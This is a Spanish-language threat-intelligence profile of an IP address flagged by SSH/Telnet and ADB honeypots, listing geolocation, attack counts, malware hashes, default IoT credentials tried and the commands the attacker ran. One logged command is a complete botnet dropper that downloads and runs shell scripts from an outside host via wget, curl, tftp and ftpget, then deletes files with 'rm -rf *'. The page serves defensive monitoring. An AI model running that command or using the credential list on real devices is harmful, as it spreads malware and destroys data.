TROYANOSYVIRUS
Amenaza ActivaALTO

165.22.252.236

Pais de Origen🇸🇬 Singapur
Primera Deteccion27/3/2026
Ultima Actividad29/3/2026
ISPDigitalOcean, LLC
🎯
154
Ataques Totales
🔌
2
Puertos
📡
2
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇸🇬 Singapur
Ciudad
Singapore
ASN
AS14061
ISP
DigitalOcean, LLC

Tipos de Ataque

ssh_telnet_honeypot
adb_honeypot

Puertos Atacados

235555

Malware Asociado

836a7b5f7249e844911c...c78e6c73ac9a847b19d1...

Credenciales Intentadas

🔐root/icatch99
2x
🔐root/(vacio)
2x
🔐admin/admin
2x
🔐root/vizxv
1x
🔐admin/anko
1x
🔐admin/(vacio)
1x
🔐admin/system
1x
🔐root/123456
1x
🔐support/support
1x
🔐admin/123456
1x
🔐root/anko
1x
🔐root/86981198
1x
🔐telnet/telnet
1x
🔐ubnt/ubnt
1x
🔐root/toor
1x

Comandos Ejecutados

$echo hello3x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.22.92/1.sh; curl -O http://206.189.22.92/1.sh; chmod 777 1.sh; sh 1.sh; tftp 206.189.22.92 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 206.189.22.92; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 206.189.22.92 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *1x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
47001

Evaluacion de Riesgo

60
/100
BajoMedioAltoCritico